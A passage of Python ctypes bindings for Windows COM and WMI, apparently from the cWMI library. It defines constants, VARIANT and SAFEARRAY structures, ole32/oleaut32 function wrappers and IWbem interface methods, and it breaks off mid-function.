WBEMMOF_E_EXPECTED_DOLLAR = 0x80044019
WBEMMOF_E_CIMTYPE_QUALIFIER = 0x8004401a
WBEMMOF_E_DUPLICATE_PROPERTY = 0x8004401b
WBEMMOF_E_INVALID_NAMESPACE_SPECIFICATION = 0x8004401c
WBEMMOF_E_OUT_OF_RANGE = 0x8004401d
WBEMMOF_E_INVALID_FILE = 0x8004401e
WBEMMOF_E_ALIASES_IN_EMBEDDED = 0x8004401f
WBEMMOF_E_NULL_ARRAY_ELEM = 0x80044020
WBEMMOF_E_DUPLICATE_QUALIFIER = 0x80044021
WBEMMOF_E_EXPECTED_FLAVOR_TYPE = 0x80044022
WBEMMOF_E_INCOMPATIBLE_FLAVOR_TYPES = 0x80044023
WBEMMOF_E_MULTIPLE_ALIASES = 0x80044024
WBEMMOF_E_INCOMPATIBLE_FLAVOR_TYPES2 = 0x80044025
WBEMMOF_E_NO_ARRAYS_RETURNED = 0x80044026
WBEMMOF_E_MUST_BE_IN_OR_OUT = 0x80044027
WBEMMOF_E_INVALID_FLAGS_SYNTAX = 0x80044028
WBEMMOF_E_EXPECTED_BRACE_OR_BAD_TYPE = 0x80044029
WBEMMOF_E_UNSUPPORTED_CIMV22_QUAL_VALUE = 0x8004402a
WBEMMOF_E_UNSUPPORTED_CIMV22_DATA_TYPE = 0x8004402b
WBEMMOF_E_INVALID_DELETEINSTANCE_SYNTAX = 0x8004402c
WBEMMOF_E_INVALID_QUALIFIER_SYNTAX = 0x8004402d
WBEMMOF_E_QUALIFIER_USED_OUTSIDE_SCOPE = 0x8004402e
WBEMMOF_E_ERROR_CREATING_TEMP_FILE = 0x8004402f
WBEMMOF_E_ERROR_INVALID_INCLUDE_FILE = 0x80044030
WBEMMOF_E_INVALID_DELETECLASS_SYNTAX = 0x80044031
EOAC_NONE = 0
EOAC_MUTUAL_AUTH = 0x1
EOAC_STATIC_CLOAKING = 0x20
EOAC_DYNAMIC_CLOAKING = 0x40
EOAC_ANY_AUTHORITY = 0x80
EOAC_MAKE_FULLSIC = 0x100
EOAC_DEFAULT = 0x800
EOAC_SECURE_REFS = 0x2
EOAC_ACCESS_CONTROL = 0x4
EOAC_APPID = 0x8
EOAC_DYNAMIC = 0x10
EOAC_REQUIRE_FULLSIC = 0x200
EOAC_AUTO_IMPERSONATE = 0x400
EOAC_NO_CUSTOM_MARSHAL = 0x2000
EOAC_DISABLE_AAA = 0x1000
RPC_C_IMP_LEVEL_DEFAULT = 0
RPC_C_IMP_LEVEL_ANONYMOUS = 1
RPC_C_IMP_LEVEL_IDENTIFY = 2
RPC_C_IMP_LEVEL_IMPERSONATE = 3
RPC_C_IMP_LEVEL_DELEGATE = 4
RPC_C_AUTHN_LEVEL_DEFAULT = 0
RPC_C_AUTHN_LEVEL_NONE = 1
RPC_C_AUTHN_LEEL_CONNECT = 2
RPC_C_AUTHN_LEVEL_CALL = 3
RPC_C_AUTHN_LEVEL_PKT = 4
RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5
RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6
RPC_AUTH_IDENTITY_HANDLE = wintypes.HANDLE
RPC_AUTHZ_HANDLE = wintypes.HANDLE
RPC_C_AUTHN_NONE = 0
RPC_C_AUTHN_DCE_PRIVATE = 1
RPC_C_AUTHN_DCE_PUBLIC = 2
RPC_C_AUTHN_DEC_PUBLIC = 4
RPC_C_AUTHN_GSS_NEGOTIATE = 9
RPC_C_AUTHN_WINNT = 10
RPC_C_AUTHN_GSS_SCHANNEL = 14
RPC_C_AUTHN_GSS_KERBEROS = 16
RPC_C_AUTHN_DPA = 17
RPC_C_AUTHN_MSN = 18
RPC_C_AUTHN_DIGEST = 21
RPC_C_AUTHN_KERNEL = 20
RPC_C_AUTHZ_NONE = 0
RPC_C_AUTHZ_NAME = 1
RPC_C_AUTHZ_DCE = 2
RPC_C_AUTHZ_DEFAULT = 0xffffffff
VT_EMPTY = 0
VT_NULL = 1
VT_I2 = 2
VT_I4 = 3
VT_R4 = 4
VT_R8 = 5
VT_CY = 6
VT_DATE = 7
VT_BSTR = 8
VT_DISPATCH = 9
VT_ERROR = 10
VT_BOOL = 11
VT_VARIANT = 12
VT_UNKNOWN = 13
VT_DECIMAL = 14
VT_I1 = 16
VT_UI1 = 17
VT_UI2 = 18
VT_UI4 = 19
VT_I8 = 20
VT_UI8 = 21
VT_INT = 22
VT_UINT = 23
VT_VOID = 24
VT_HRESULT = 25
VT_PTR = 26
VT_SAFEARRAY = 27
VT_CARRAY = 28
VT_USERDEFINED = 29
VT_LPSTR = 30
VT_LPWSTR = 31
VT_RECORD = 36
VT_INT_PTR = 37
VT_UINT_PTR = 38
VT_FILETIME = 64
VT_BLOB = 65
VT_STREAM = 66
VT_STORAGE = 67
VT_STREAMED_OBJECT = 68
VT_STORED_OBJECT = 69
VT_BLOB_OBJECT = 70
VT_CF = 71
VT_CLSID = 72
VT_VERSIONED_STREAM = 73
VT_BSTR_BLOB = 0xfff
VT_VECTOR = 0x1000
VT_ARRAY = 0x2000
VT_BYREF = 0x4000
VT_RESERVED = 0x8000
VT_ILLEGAL = 0xffff
VT_ILLEGALMASKED = 0xfff
VT_TYPEMASK = 0xfff
VT_GENERIC = -1
VARTYPE = ctypes.c_ushort
class SOLE_AUTHENTICATION_SERVICE(ctypes.Structure):
_fields_ = [
('dwAuthnSvc', wintypes.DWORD),
('dwAuthzSvc', wintypes.DWORD),
('pPrincipalName', wintypes.OLESTR),
('hr', HRESULT)
]
class GUID(ctypes.Structure):
_fields_ = [
('Data1', wintypes.DWORD),
('Data2', wintypes.WORD),
('Data3', wintypes.WORD),
('Data4', wintypes.BYTE * 8),
]
class SECURITY_DESCRIPTOR(ctypes.Structure):
_fields_ = [('Revision', ctypes.c_byte),
('Sbz1', ctypes.c_byte),
('Control', ctypes.c_uint16),
('Owner', ctypes.c_void_p),
('Group', ctypes.c_void_p),
('Sacl', ctypes.c_void_p),
('Dacl', ctypes.c_void_p),
]
class SAFEARRAYBOUND(ctypes.Structure):
_fields_ = [('cElements', wintypes.ULONG),
('lLbound', wintypes.LONG)]
class SAFEARRAY(ctypes.Structure):
_fields_ = [('cDims', wintypes.USHORT),
('fFeatures', wintypes.USHORT),
('cbElements', wintypes.ULONG),
('cLocks', wintypes.ULONG),
('pvData', wintypes.LPVOID),
('rgsabound', ctypes.POINTER(SAFEARRAYBOUND))]
class DECIMAL_DUMMYSTRUCTNAME(ctypes.Structure):
_fields_ = [('scale', wintypes.BYTE),
('sign', wintypes.BYTE)]
class DECIMAL_DUMMYSTRUCTNAME2(ctypes.Structure):
_fields_ = [('Lo32', wintypes.ULONG),
('Mid32', wintypes.ULONG)]
class DECIMAL_DUMMYUNIONNAME(ctypes.Union):
_fields_ = [('DUMMYSTRUCTNAME', DECIMAL_DUMMYSTRUCTNAME),
('signscale', wintypes.USHORT)]
class DECIMAL_DUMMYUNIONNAME2(ctypes.Union):
_fields_ = [('DUMMYSTRUCTNAME2', DECIMAL_DUMMYSTRUCTNAME2),
('Lo64', ctypes.c_ulonglong)]
class DECIMAL(ctypes.Structure):
_fields_ = [('DUMMYUNIONNAME', DECIMAL_DUMMYUNIONNAME),
('Hi32', wintypes.ULONG),
('DUMMYUNIONNAME2', DECIMAL_DUMMYUNIONNAME2)]
class VARIANT__tagBRECORD(ctypes.Structure):
_fields_ = [("pvRecord", wintypes.LPVOID),
("pRecInfo", wintypes.LPVOID)] # IRecordInfo * pRecInfo;
class VARIANT__VARIANT_NAME_3(ctypes.Union):
_fields_ = [("llVal", wintypes.USHORT),
("lVal", wintypes.USHORT),
('llVal', ctypes.c_longlong),
('lVal', wintypes.LONG),
('bVal', wintypes.BYTE),
('iVal', wintypes.SHORT),
('fltVal', wintypes.FLOAT),
('dblVal', wintypes.DOUBLE),
('boolVal', wintypes.VARIANT_BOOL),
('bool', wintypes.VARIANT_BOOL),
('scode', wintypes.LONG),
('cyVal', wintypes.LPVOID), # struct CY
('date', wintypes.DOUBLE),
('bstrVal', BSTR),
('punkVal', wintypes.LPVOID), # IUnknown *
('pdispVal', wintypes.LPVOID), # IDispatch *
('parray', ctypes.POINTER(SAFEARRAY)),
('pbVal', ctypes.POINTER(wintypes.BYTE)),
('piVal', PSHORT),
('plVal', ctypes.POINTER(wintypes.LONG)),
('pllVal', ctypes.POINTER(ctypes.c_longlong)),
('pfltVal', ctypes.POINTER(wintypes.FLOAT)),
('pdblVal', ctypes.POINTER(wintypes.DOUBLE)),
('pboolVal', ctypes.POINTER(wintypes.VARIANT_BOOL)),
('pbool', ctypes.POINTER(wintypes.VARIANT_BOOL)),
('pscode', LPLONG),
('pcyVal', wintypes.LPVOID), # CY *
('pdate', ctypes.POINTER(wintypes.DOUBLE)),
('pbstrVal', ctypes.POINTER(BSTR)),
('ppunkVal', ctypes.POINTER(wintypes.LPVOID)), # IUnknown **
('ppdispVal', ctypes.POINTER(wintypes.LPVOID)), # IDispatch **
('pparray', ctypes.POINTER(ctypes.POINTER(SAFEARRAY))),
('pvarVal', wintypes.LPVOID), # VARIANT*
('byref', wintypes.LPVOID),
('cVal', CHAR),
('uiVal', wintypes.USHORT),
('ulVal', wintypes.ULONG),
('ullVal', ctypes.c_ulonglong),
('intVal', wintypes.INT),
('uintVal', wintypes.UINT),
('pdecVal', ctypes.POINTER(DECIMAL)),
('pcVal', PCHAR),
('puiVal', PUSHORT),
('pulVal', PULONG),
('pullVal', ctypes.POINTER(ctypes.c_ulonglong)),
('pintVal', ctypes.POINTER(wintypes.INT)),
('puintVal', ctypes.POINTER(wintypes.UINT)),
("__VARIANT_NAME_4", VARIANT__tagBRECORD)]
class VARIANT__tagVARIANT(ctypes.Structure):
_fields_ = [("vt", wintypes.USHORT),
("wReserved1", wintypes.WORD),
("wReserved2", wintypes.WORD),
("wReserved3", wintypes.WORD),
("__VARIANT_NAME_3", VARIANT__VARIANT_NAME_3)]
class VARIANT__VARIANT_NAME_1(ctypes.Union):
_fields_ = [("__VARIANT_NAME_2", VARIANT__tagVARIANT),
("decVal", DECIMAL)]
class VARIANT(ctypes.Structure):
_fields_ = [('__VARIANT_NAME_1', VARIANT__VARIANT_NAME_1)]
def V_VAR3(X):
return X.__VARIANT_NAME_1.__VARIANT_NAME_2.__VARIANT_NAME_3
def V_VT(X):
return X.__VARIANT_NAME_1.__VARIANT_NAME_2.vt
V_VAR = V_VAR3
def V_EMPTY():
return ''
def V_NULL():
return 'NULL'
def V_BSTR(var):
return convert_bstr_to_str(V_VAR3(var).bstrVal)
def V_BOOL(var):
return V_VAR(var).boolVal
def V_DATE(var):
return V_VAR(var).date
def V_I2(var):
return V_VAR(var).lVal
def V_I4(var):
return V_VAR(var).lVal
def V_I8(var):
return V_VAR(var).llVal
def V_R4(var):
return V_VAR(var).lVal
def V_R8(var):
return V_VAR(var).llVal
def V_GENERIC(var):
return V_VAR(var).byref
def V_TO_STR(var):
ret = ''
vt = V_VT(var)
if vt == VT_EMPTY:
ret = V_EMPTY()
elif vt == VT_NULL:
ret = V_NULL()
elif vt == VT_DATE:
ret = str(V_DATE(var))
elif vt == VT_BSTR:
ret = V_BSTR(var)
elif vt == VT_BOOL:
ret = str(V_BOOL(var))
elif vt == VT_I2:
ret = str(V_I2(var))
elif vt == VT_I4:
ret = str(V_I4(var))
elif vt == VT_I8:
ret = str(V_I8(var))
elif vt == VT_R4:
ret = str(V_R4(var))
elif vt == VT_R8:
ret = str(V_R8(var))
else:
try:
ret = str(V_GENERIC(var))
except:
pass
return ret
def V_TO_VT_DICT(var):
ret = {}
vt = V_VT(var)
if vt == VT_EMPTY:
ret['value'] = V_EMPTY()
elif vt == VT_NULL:
ret['value'] = V_NULL()
elif vt == VT_DATE:
ret['value'] = V_DATE(var)
elif vt == VT_BSTR:
ret['value'] = V_BSTR(var)
elif vt == VT_BOOL:
ret['value'] = V_BOOL(var)
elif vt == VT_I2:
ret['value'] = V_I2(var)
elif vt == VT_I4:
ret['value'] = V_I4(var)
elif vt == VT_I8:
ret['value'] = V_I8(var)
elif vt == VT_R4:
ret['value'] = V_R4(var)
elif vt == VT_R8:
ret['value'] = V_R8(var)
else:
try:
ret['value'] = V_GENERIC(var)
except:
pass
ret['type'] = vt
return ret
def V_TO_TYPE(var):
ret = None
vt = V_VT(var)
if vt == VT_NULL:
ret = V_NULL()
elif vt == VT_DATE:
ret = V_DATE(var)
elif vt == VT_BSTR:
ret = V_BSTR(var)
elif vt == VT_BOOL:
ret = V_BOOL(var)
elif vt == VT_I2:
ret = V_I2(var)
elif vt == VT_I4:
ret = V_I4(var)
elif vt == VT_I8:
ret = V_I8(var)
elif vt == VT_R4:
ret = V_R4(var)
elif vt == VT_R8:
ret = V_R8(var)
else:
try:
ret = V_GENERIC(var)
except:
pass
return ret
def SET_VT(var, vt):
var.__VARIANT_NAME_1.__VARIANT_NAME_2.vt = vt
VARIANTARG = VARIANT
CLSID_WbemLocator = GUID(0x4590f811, 0x1d3a, 0x11d0, (0x89, 0x1f, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24))
IID_IWbemLocator = GUID(0xdc12a687, 0x737f, 0x11cf, (0x88, 0x4d, 0x00, 0xaa, 0x00, 0x4b, 0x2e, 0x24))
ole32 = ctypes.windll.ole32
oleaut32 = ctypes.windll.oleaut32
def RAISE_NON_ZERO_ERR(result, func, args):
if result != 0:
raise ctypes.WinError(result)
return args
def convert_bstr_to_str(bstr):
length = SysStringLen(bstr)
converted_string = str(bstr[:length])
SysFreeString(bstr)
return converted_string
def CoInitializeEx(reserved, co_init):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
wintypes.LPVOID,
wintypes.DWORD
)
paramflags = (
(_In_, 'pvReserved'),
(_In_, 'dwCoInit')
)
_CoInitializeEx = prototype(('CoInitializeEx', ole32), paramflags)
_CoInitializeEx.errcheck = RAISE_NON_ZERO_ERR
return _CoInitializeEx(reserved, co_init)
def CoUninitialize():
prototype = ctypes.WINFUNCTYPE(
None
)
_CoUninitialize = prototype(('CoUninitialize', ole32))
_CoUninitialize()
def CoCreateInstance(clsid, unk, ctx, iid):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(GUID),
wintypes.LPVOID,
wintypes.DWORD,
ctypes.POINTER(GUID),
ctypes.POINTER(wintypes.LPVOID)
)
paramflags = (
(_In_, 'rclsid'),
(_In_, 'pUnkOuter'),
(_In_, 'dwClsContext'),
(_In_, 'riid'),
(_Out_, 'ppv')
)
_CoCreateInstance = prototype(('CoCreateInstance', ole32), paramflags)
_CoCreateInstance.errcheck = RAISE_NON_ZERO_ERR
return _CoCreateInstance(clsid, unk, ctx, iid)
def CoInitializeSecurity(sec_desc,
c_auth_svc,
as_auth_svc,
reserved1,
auth_level,
imp_level,
auth_list,
capibilities,
reserved3):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SECURITY_DESCRIPTOR),
wintypes.LONG,
ctypes.POINTER(SOLE_AUTHENTICATION_SERVICE),
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.LPVOID
)
paramflags = (
(_In_, 'pSecDesc'),
(_In_, 'cAuthSvc'),
(_In_, 'asAuthSvc'),
(_In_, 'pReserved1'),
(_In_, 'dwAuthnLevel'),
(_In_, 'dwImpLevel'),
(_In_, 'pAuthList'),
(_In_, 'dwCapabilities'),
(_In_, 'pReserved3')
)
_CoInitializeSecurity = prototype(('CoInitializeSecurity', ole32), paramflags)
_CoInitializeSecurity.errcheck = RAISE_NON_ZERO_ERR
return _CoInitializeSecurity(sec_desc,
c_auth_svc,
as_auth_svc,
reserved1,
auth_level,
imp_level,
auth_list,
capibilities,
reserved3)
def CoSetProxyBlanket(proxy,
authn_svc,
authz_svc,
server_p_name,
authn_level,
imp_level,
auth_info,
capabilities):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.OLESTR,
wintypes.DWORD,
wintypes.DWORD,
RPC_AUTH_IDENTITY_HANDLE,
wintypes.DWORD
)
paramflags = (
(_In_, 'pProxy'),
(_In_, 'dwAuthnSvc'),
(_In_, 'dwAuthzSvc'),
(_In_, 'pServerPrincName'),
(_In_, 'dwAuthnLevel'),
(_In_, 'dwImpLevel'),
(_In_, 'pAuthInfo'),
(_In_, 'dwCapabilities')
)
_CoSetProxyBlanket = prototype(('CoSetProxyBlanket', ole32), paramflags)
_CoSetProxyBlanket.errcheck = RAISE_NON_ZERO_ERR
return _CoSetProxyBlanket(proxy,
authn_svc,
authz_svc,
server_p_name,
authn_level,
imp_level,
auth_info,
capabilities)
def SysAllocString(wstr):
prototype = ctypes.WINFUNCTYPE(
BSTR,
wintypes.LPOLESTR
)
paramflags = (
(_In_, 'psz'),
)
_SysAllocString = prototype(('SysAllocString', oleaut32), paramflags)
return _SysAllocString(wstr)
def SysFreeString(bstr):
prototype = ctypes.WINFUNCTYPE(
None,
BSTR
)
paramflags = (
(_In_, 'bstrString'),
)
_SysFreeString = prototype(('SysFreeString', oleaut32), paramflags)
_SysFreeString(bstr)
def SysStringLen(bstr):
prototype = ctypes.WINFUNCTYPE(
wintypes.UINT,
BSTR
)
paramflags = (
(_In_, 'pbstr'),
)
_SysStringLen = prototype(('SysStringLen', oleaut32), paramflags)
return _SysStringLen(bstr)
def VariantInit(var):
prototype = ctypes.WINFUNCTYPE(
None,
ctypes.POINTER(VARIANTARG)
)
paramflags = (
(_In_, 'pvarg'),
)
_VariantInit = prototype(('VariantInit', oleaut32), paramflags)
_VariantInit(var)
def VariantClear(var):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(VARIANTARG)
)
paramflags = (
(_In_, 'pvarg'),
)
_VariantClear = prototype(('VariantClear', oleaut32), paramflags)
_VariantClear.errcheck = RAISE_NON_ZERO_ERR
return _VariantClear(var)
def SafeArrayCreate(vt, dims, bound):
prototype = ctypes.WINFUNCTYPE(
ctypes.POINTER(SAFEARRAY),
VARTYPE,
wintypes.UINT,
ctypes.POINTER(SAFEARRAYBOUND)
)
paramflags = (
(_In_, 'vt'),
(_In_, 'cDims'),
(_In_, 'rgsabound'),
)
_SafeArrayCreate = prototype(('SafeArrayCreate', oleaut32), paramflags)
return _SafeArrayCreate(vt, dims, bound)
def SafeArrayDestroy(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayDestroy = prototype(('SafeArrayDestroy', oleaut32), paramflags)
_SafeArrayDestroy.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayDestroy(sa)
def SafeArrayLock(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayLock = prototype(('SafeArrayLock', oleaut32), paramflags)
_SafeArrayLock.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayLock(sa)
def SafeArrayUnlock(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayUnlock = prototype(('SafeArrayUnlock', oleaut32), paramflags)
_SafeArrayUnlock.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayUnlock(sa)
def SafeArrayAccessData(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY),
ctypes.POINTER(wintypes.LPVOID)
)
paramflags = (
(_In_, 'psa'),
(_Out_, 'ppvData', ctypes.pointer(wintypes.LPVOID(None))),
)
_SafeArrayAccessData = prototype(('SafeArrayAccessData', oleaut32), paramflags)
_SafeArrayAccessData.errcheck = RAISE_NON_ZERO_ERR
return_obj = _SafeArrayAccessData(sa)
return return_obj.contents
def SafeArrayUnaccessData(sa):
prototype = ctypes.WINFUNCTYPE(
HRESULT,
ctypes.POINTER(SAFEARRAY)
)
paramflags = (
(_In_, 'psa'),
)
_SafeArrayUnaccessData = prototype(('SafeArrayUnaccessData', oleaut32), paramflags)
_SafeArrayUnaccessData.errcheck = RAISE_NON_ZERO_ERR
return _SafeArrayUnaccessData(sa)
```
#### File: cWMI/cwmi/wmi.py
```python
import ctypes
from ctypes import wintypes
from . import com
from . import winapi
from .wintype import HRESULT, BSTR, CIMTYPE
_In_ = 1
_Out_ = 2
IWbemObjectSink_Indicate_Idx = 3
IWbemObjectSink_SetStatus_Idx = 4
class IWbemObjectSink(com.IUnknown):
def Indicate(self, object_count, obj_array):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lObjectCount'),
(_In_, 'apObjArray'),
)
_Indicate = prototype(IWbemObjectSink_Indicate_Idx,
'Indicate',
paramflags)
_Indicate.errcheck = winapi.RAISE_NON_ZERO_ERR
_Indicate(self.this,
object_count,
obj_array.this if obj_array else None
)
def SetStatus(self, flags, result, param, obj_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
HRESULT,
BSTR,
ctypes.POINTER(IWbemClassObject))
paramflags = ((_In_, 'lFlags'),
(_In_, 'hResult'),
(_In_, 'strParam'),
(_In_, 'pObjParam'),
)
_SetStatus = prototype(IWbemObjectSink_SetStatus_Idx,
'SetStatus',
paramflags)
_SetStatus.errcheck = winapi.RAISE_NON_ZERO_ERR
param_bstr = winapi.SysAllocString(param) if param is not None else None
try:
_SetStatus(self.this,
flags,
result,
param_bstr,
obj_param.this if obj_param else None
)
finally:
if param_bstr is not None:
winapi.SysFreeString(param_bstr)
IWbemQualifierSet_Get_Idx = 3
IWbemQualifierSet_Put_Idx = 4
IWbemQualifierSet_Delete_Idx = 5
IWbemQualifierSet_GetNames_Idx = 6
IWbemQualifierSet_BeginEnumeration_Idx = 7
IWbemQualifierSet_Next_Idx = 8
IWbemQualifierSet_EndEnumeration_Idx = 9
class IWbemQualifierSet(com.IUnknown):
def Get(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pVal'),
(_Out_, 'plFlavor'),
)
_Get = prototype(IWbemQualifierSet_Get_Idx,
'Get',
paramflags)
_Get.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2 = _Get(self.this,
name,
flags
)
return return_obj, return_obj2
def Put(self, name, val, flavor):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.POINTER(winapi.VARIANT),
ctypes.c_long)
paramflags = ((_In_, 'wszName'),
(_In_, 'pVal'),
(_In_, 'lFlavor'),
)
_Put = prototype(IWbemQualifierSet_Put_Idx,
'Put',
paramflags)
_Put.errcheck = winapi.RAISE_NON_ZERO_ERR
_Put(self.this,
name,
ctypes.byref(val) if val else None,
flavor
)
def Delete(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_Delete = prototype(IWbemQualifierSet_Delete_Idx,
'Delete',
paramflags)
_Delete.errcheck = winapi.RAISE_NON_ZERO_ERR
_Delete(self.this,
name
)
def GetNames(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemQualifierSet_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
flags
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lFlags'),
)
_BeginEnumeration = prototype(IWbemQualifierSet_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lFlags'),
(_Out_, 'pstrName'),
(_Out_, 'pVal'),
(_Out_, 'plFlavor'),
)
_Next = prototype(IWbemQualifierSet_Next_Idx,
'Next',
paramflags)
_Next.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _Next(self.this,
flags
)
return_obj = winapi.convert_bstr_to_str(return_obj)
return return_obj, return_obj2, return_obj3
def EndEnumeration(self):
prototype = ctypes.WINFUNCTYPE(HRESULT)
paramflags = ()
_EndEnumeration = prototype(IWbemQualifierSet_EndEnumeration_Idx,
'EndEnumeration',
paramflags)
_EndEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_EndEnumeration(self.this
)
IWbemClassObject_GetQualifierSet_Idx = 3
IWbemClassObject_Get_Idx = 4
IWbemClassObject_Put_Idx = 5
IWbemClassObject_Delete_Idx = 6
IWbemClassObject_GetNames_Idx = 7
IWbemClassObject_BeginEnumeration_Idx = 8
IWbemClassObject_Next_Idx = 9
IWbemClassObject_EndEnumeration_Idx = 10
IWbemClassObject_GetPropertyQualifierSet_Idx = 11
IWbemClassObject_Clone_Idx = 12
IWbemClassObject_GetObjectText_Idx = 13
IWbemClassObject_SpawnDerivedClass_Idx = 14
IWbemClassObject_SpawnInstance_Idx = 15
IWbemClassObject_CompareTo_Idx = 16
IWbemClassObject_GetPropertyOrigin_Idx = 17
IWbemClassObject_InheritsFrom_Idx = 18
IWbemClassObject_GetMethod_Idx = 19
IWbemClassObject_PutMethod_Idx = 20
IWbemClassObject_DeleteMethod_Idx = 21
IWbemClassObject_BeginMethodEnumeration_Idx = 22
IWbemClassObject_NextMethod_Idx = 23
IWbemClassObject_EndMethodEnumeration_Idx = 24
IWbemClassObject_GetMethodQualifierSet_Idx = 25
IWbemClassObject_GetMethodOrigin_Idx = 26
class IWbemClassObject(com.IUnknown):
def GetQualifierSet(self):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_Out_, 'ppQualSet'),
)
_GetQualifierSet = prototype(IWbemClassObject_GetQualifierSet_Idx,
'GetQualifierSet',
paramflags)
_GetQualifierSet.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetQualifierSet(self.this
)
try:
return_obj = IWbemQualifierSet(return_obj)
except WindowsError:
return_obj = None
return return_obj
def Get(self, name, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(CIMTYPE),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_Out_, 'pVal'),
(_Out_, 'pType'),
(_Out_, 'plFlavor'),
)
_Get = prototype(IWbemClassObject_Get_Idx,
'Get',
paramflags)
_Get.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj, return_obj2, return_obj3 = _Get(self.this,
name,
flags
)
return return_obj, return_obj2, return_obj3
def Put(self, name, flags, val, type_param):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
CIMTYPE)
paramflags = ((_In_, 'wszName'),
(_In_, 'lFlags'),
(_In_, 'pVal'),
(_In_, 'Type'),
)
_Put = prototype(IWbemClassObject_Put_Idx,
'Put',
paramflags)
_Put.errcheck = winapi.RAISE_NON_ZERO_ERR
_Put(self.this,
name,
flags,
ctypes.byref(val) if val else None,
type_param
)
def Delete(self, name):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR)
paramflags = ((_In_, 'wszName'),
)
_Delete = prototype(IWbemClassObject_Delete_Idx,
'Delete',
paramflags)
_Delete.errcheck = winapi.RAISE_NON_ZERO_ERR
_Delete(self.this,
name
)
def GetNames(self, qualifier_name, flags, qualifier_val):
prototype = ctypes.WINFUNCTYPE(HRESULT,
wintypes.LPCWSTR,
ctypes.c_long,
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(wintypes.LPVOID))
paramflags = ((_In_, 'wszQualifierName'),
(_In_, 'lFlags'),
(_In_, 'pQualifierVal'),
(_Out_, 'pNames'),
)
_GetNames = prototype(IWbemClassObject_GetNames_Idx,
'GetNames',
paramflags)
_GetNames.errcheck = winapi.RAISE_NON_ZERO_ERR
return_obj = _GetNames(self.this,
qualifier_name,
flags,
ctypes.byref(qualifier_val) if qualifier_val else None
)
return_obj = ctypes.cast(wintypes.LPVOID(return_obj), ctypes.POINTER(winapi.SAFEARRAY))
return return_obj
def BeginEnumeration(self, enum_flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long)
paramflags = ((_In_, 'lEnumFlags'),
)
_BeginEnumeration = prototype(IWbemClassObject_BeginEnumeration_Idx,
'BeginEnumeration',
paramflags)
_BeginEnumeration.errcheck = winapi.RAISE_NON_ZERO_ERR
_BeginEnumeration(self.this,
enum_flags
)
def Next(self, flags):
prototype = ctypes.WINFUNCTYPE(HRESULT,
ctypes.c_long,
ctypes.POINTER(BSTR),
ctypes.POINTER(winapi.VARIANT),
ctypes.POINTER(CIMTYPE),
ctypes.POINTER(ctypes.c_long))
paramflags = ((_In_, 'lFlags'),
